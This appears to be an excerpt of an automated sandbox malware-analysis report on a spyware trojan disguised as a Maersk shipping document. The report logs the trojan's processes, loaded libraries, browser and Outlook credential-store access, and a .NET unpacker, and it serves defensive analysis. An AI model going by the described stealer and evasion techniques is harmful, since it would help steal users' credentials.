                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exeCode function: 5_2_0250F8E85_2_0250F8E8
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exeCode function: 5_2_0250F8ED5_2_0250F8ED
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exeCode function: 5_2_0250915D5_2_0250915D
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exeCode function: 5_2_025116D05_2_025116D0
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exeCode function: 5_2_02508F355_2_02508F35
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exeCode function: 5_2_02508F3D5_2_02508F3D
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exeCode function: 5_2_02527C3D5_2_02527C3D
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_0342D34C6_2_0342D34C
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_034FA3526_2_034FA352
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_034F132D6_2_034F132D
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_0344E3F06_2_0344E3F0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_035003E66_2_035003E6
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_0348739A6_2_0348739A
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_034E02746_2_034E0274
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_0345B2C06_2_0345B2C0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_034E12ED6_2_034E12ED
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_034452A06_2_034452A0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_034C81586_2_034C8158
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_0347516C6_2_0347516C
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_0342F1726_2_0342F172
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_0350B16B6_2_0350B16B
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_034301006_2_03430100
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_034DA1186_2_034DA118
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_034F81CC6_2_034F81CC
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_0344B1B06_2_0344B1B0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_035001AA6_2_035001AA
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_034EF0CC6_2_034EF0CC
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_034470C06_2_034470C0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_034F70E96_2_034F70E9
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_034FF0E06_2_034FF0E0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_034647506_2_03464750
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_034407706_2_03440770
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_0343C7C06_2_0343C7C0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_034FF7B06_2_034FF7B0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_034F16CC6_2_034F16CC
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_0345C6E06_2_0345C6E0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_034F75716_2_034F7571
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_034405356_2_03440535
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_035005916_2_03500591
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_034DD5B06_2_034DD5B0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_034F24466_2_034F2446
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_034314606_2_03431460
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_034FF43F6_2_034FF43F
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_034EE4F66_2_034EE4F6
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_034FAB406_2_034FAB40
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_034FFB766_2_034FFB76
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_034F6BD76_2_034F6BD7
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_034B5BF06_2_034B5BF0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_0347DBF96_2_0347DBF9
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_0345FB806_2_0345FB80
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_034FFA496_2_034FFA49
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_034F7A466_2_034F7A46
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_034B3A6C6_2_034B3A6C
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_034EDAC66_2_034EDAC6
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_0343EA806_2_0343EA80
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_034DDAAC6_2_034DDAAC
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03485AA06_2_03485AA0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_034499506_2_03449950
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_0345B9506_2_0345B950
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_034569626_2_03456962
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_034429A06_2_034429A0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_0350A9A66_2_0350A9A6
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_034428406_2_03442840
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_0344A8406_2_0344A840
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_034AD8006_2_034AD800
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_034438E06_2_034438E0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_0346E8F06_2_0346E8F0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_034268B86_2_034268B8
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_034B4F406_2_034B4F40
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_034FFF096_2_034FFF09
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03482F286_2_03482F28
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03460F306_2_03460F30
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03432FC86_2_03432FC8
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_0344CFE06_2_0344CFE0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03441F926_2_03441F92
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_034BEFA06_2_034BEFA0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_034FFFB16_2_034FFFB1
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03440E596_2_03440E59
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_034FEE266_2_034FEE26
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_034FEEDB6_2_034FEEDB
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03452E906_2_03452E90
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_034FCE936_2_034FCE93
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03449EB06_2_03449EB0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03443D406_2_03443D40
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_034F1D5A6_2_034F1D5A
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_034F7D736_2_034F7D73
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_0344AD006_2_0344AD00
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_0345FDC06_2_0345FDC0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_0343ADE06_2_0343ADE0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03458DBF6_2_03458DBF
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03440C006_2_03440C00
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_034B9C326_2_034B9C32
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03430CF26_2_03430CF2
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_034FFCF26_2_034FFCF2
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_034E0CB56_2_034E0CB5
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_009721306_2_00972130
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_0096D0506_2_0096D050
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_0096D0486_2_0096D048
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_0096B2906_2_0096B290
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_0096D2706_2_0096D270
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_0096B3E06_2_0096B3E0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_009757F06_2_009757F0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_009739FB6_2_009739FB
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_00973A006_2_00973A00
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_0098BD506_2_0098BD50
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_0330E5446_2_0330E544
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_0330E4266_2_0330E426
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_0330D9A86_2_0330D9A8
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_0330E8DC6_2_0330E8DC
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_0330CC486_2_0330CC48
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: String function: 0179B970 appears 280 times
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: String function: 017E5130 appears 58 times
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: String function: 0182F290 appears 105 times
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: String function: 017F7E54 appears 111 times
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: String function: 0181EA12 appears 86 times
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: String function: 034AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: String function: 0342B970 appears 268 times
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: String function: 03475130 appears 36 times
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: String function: 03487E54 appears 96 times
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: String function: 034BF290 appears 105 times
                Source: MAERSK LINE SHIPPING DOC_4253.exe, 00000000.00000002.1335365759.000000000158E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs MAERSK LINE SHIPPING DOC_4253.exe
                Source: MAERSK LINE SHIPPING DOC_4253.exe, 00000000.00000002.1351593345.0000000009930000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs MAERSK LINE SHIPPING DOC_4253.exe
                Source: MAERSK LINE SHIPPING DOC_4253.exe, 00000000.00000002.1345641584.00000000043F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs MAERSK LINE SHIPPING DOC_4253.exe
                Source: MAERSK LINE SHIPPING DOC_4253.exe, 00000000.00000002.1350820628.0000000007C10000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs MAERSK LINE SHIPPING DOC_4253.exe
                Source: MAERSK LINE SHIPPING DOC_4253.exe, 00000000.00000000.1295160397.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameaqoo.exeJ vs MAERSK LINE SHIPPING DOC_4253.exe
                Source: MAERSK LINE SHIPPING DOC_4253.exe, 00000000.00000002.1345641584.0000000004439000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs MAERSK LINE SHIPPING DOC_4253.exe
                Source: MAERSK LINE SHIPPING DOC_4253.exe, 00000000.00000002.1345641584.0000000004439000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs MAERSK LINE SHIPPING DOC_4253.exe
                Source: MAERSK LINE SHIPPING DOC_4253.exe, 00000003.00000002.1888335259.000000000189D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs MAERSK LINE SHIPPING DOC_4253.exe
                Source: MAERSK LINE SHIPPING DOC_4253.exe, 00000003.00000002.1887210866.0000000001237000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenametzutil.exej% vs MAERSK LINE SHIPPING DOC_4253.exe
                Source: MAERSK LINE SHIPPING DOC_4253.exe, 00000003.00000002.1887210866.0000000001257000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenametzutil.exej% vs MAERSK LINE SHIPPING DOC_4253.exe
                Source: MAERSK LINE SHIPPING DOC_4253.exeBinary or memory string: OriginalFilenameaqoo.exeJ vs MAERSK LINE SHIPPING DOC_4253.exe
                Source: MAERSK LINE SHIPPING DOC_4253.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: MAERSK LINE SHIPPING DOC_4253.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.44e6400.2.raw.unpack, uwJUeTqjPGwpbVfh4n.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.44e6400.2.raw.unpack, uwJUeTqjPGwpbVfh4n.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.44e6400.2.raw.unpack, uwJUeTqjPGwpbVfh4n.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.9930000.4.raw.unpack, uwJUeTqjPGwpbVfh4n.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.9930000.4.raw.unpack, uwJUeTqjPGwpbVfh4n.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.9930000.4.raw.unpack, uwJUeTqjPGwpbVfh4n.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.9930000.4.raw.unpack, jMa7fjAUpnw3QeHttd.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.44e6400.2.raw.unpack, jMa7fjAUpnw3QeHttd.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@6/3
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MAERSK LINE SHIPPING DOC_4253.exe.logJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeMutant created: NULL
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
                Source: C:\Windows\SysWOW64\tzutil.exeFile created: C:\Users\user\AppData\Local\Temp\UQ63g7r-Jump to behavior
                Source: MAERSK LINE SHIPPING DOC_4253.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: MAERSK LINE SHIPPING DOC_4253.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: tzutil.exe, 00000006.00000002.2537188170.00000000031D5000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000006.00000003.2083262010.00000000031D5000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000006.00000002.2537188170.0000000003206000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000006.00000002.2537188170.00000000031E3000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000006.00000002.2537188170.00000000031B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: MAERSK LINE SHIPPING DOC_4253.exeReversingLabs: Detection: 26%
                Source: unknownProcess created: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe "C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe"
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeProcess created: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe "C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe"
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exeProcess created: C:\Windows\SysWOW64\tzutil.exe "C:\Windows\SysWOW64\tzutil.exe"
                Source: C:\Windows\SysWOW64\tzutil.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeProcess created: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe "C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe"Jump to behavior
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exeProcess created: C:\Windows\SysWOW64\tzutil.exe "C:\Windows\SysWOW64\tzutil.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: MAERSK LINE SHIPPING DOC_4253.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: MAERSK LINE SHIPPING DOC_4253.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: MAERSK LINE SHIPPING DOC_4253.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: tzutil.pdbGCTL source: MAERSK LINE SHIPPING DOC_4253.exe, 00000003.00000002.1887210866.0000000001237000.00000004.00000020.00020000.00000000.sdmp, FeNbdhmZHKN.exe, 00000005.00000003.1847284658.00000000006CB000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: FeNbdhmZHKN.exe, 00000005.00000002.2536087512.000000000002E000.00000002.00000001.01000000.0000000D.sdmp, FeNbdhmZHKN.exe, 00000009.00000000.1962093607.000000000002E000.00000002.00000001.01000000.0000000D.sdmp
                Source: Binary string: wntdll.pdbUGP source: MAERSK LINE SHIPPING DOC_4253.exe, 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000006.00000003.1895310973.0000000003256000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000006.00000002.2538262690.000000000359E000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000006.00000002.2538262690.0000000003400000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000006.00000003.1886785367.0000000002F63000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: MAERSK LINE SHIPPING DOC_4253.exe, MAERSK LINE SHIPPING DOC_4253.exe, 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, tzutil.exe, 00000006.00000003.1895310973.0000000003256000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000006.00000002.2538262690.000000000359E000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000006.00000002.2538262690.0000000003400000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000006.00000003.1886785367.0000000002F63000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: aqoo.pdbSHA256 source: MAERSK LINE SHIPPING DOC_4253.exe
                Source: Binary string: tzutil.pdb source: MAERSK LINE SHIPPING DOC_4253.exe, 00000003.00000002.1887210866.0000000001237000.00000004.00000020.00020000.00000000.sdmp, FeNbdhmZHKN.exe, 00000005.00000003.1847284658.00000000006CB000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: aqoo.pdb source: MAERSK LINE SHIPPING DOC_4253.exe

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.9930000.4.raw.unpack, uwJUeTqjPGwpbVfh4n.cs.Net Code: gu4S7GI46G System.Reflection.Assembly.Load(byte[])
                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.44e6400.2.raw.unpack, uwJUeTqjPGwpbVfh4n.cs.Net Code: gu4S7GI46G System.Reflection.Assembly.Load(byte[])
                Source: MAERSK LINE SHIPPING DOC_4253.exeStatic PE information: 0xA3168CF8 [Thu Sep 14 13:34:48 2056 UTC]
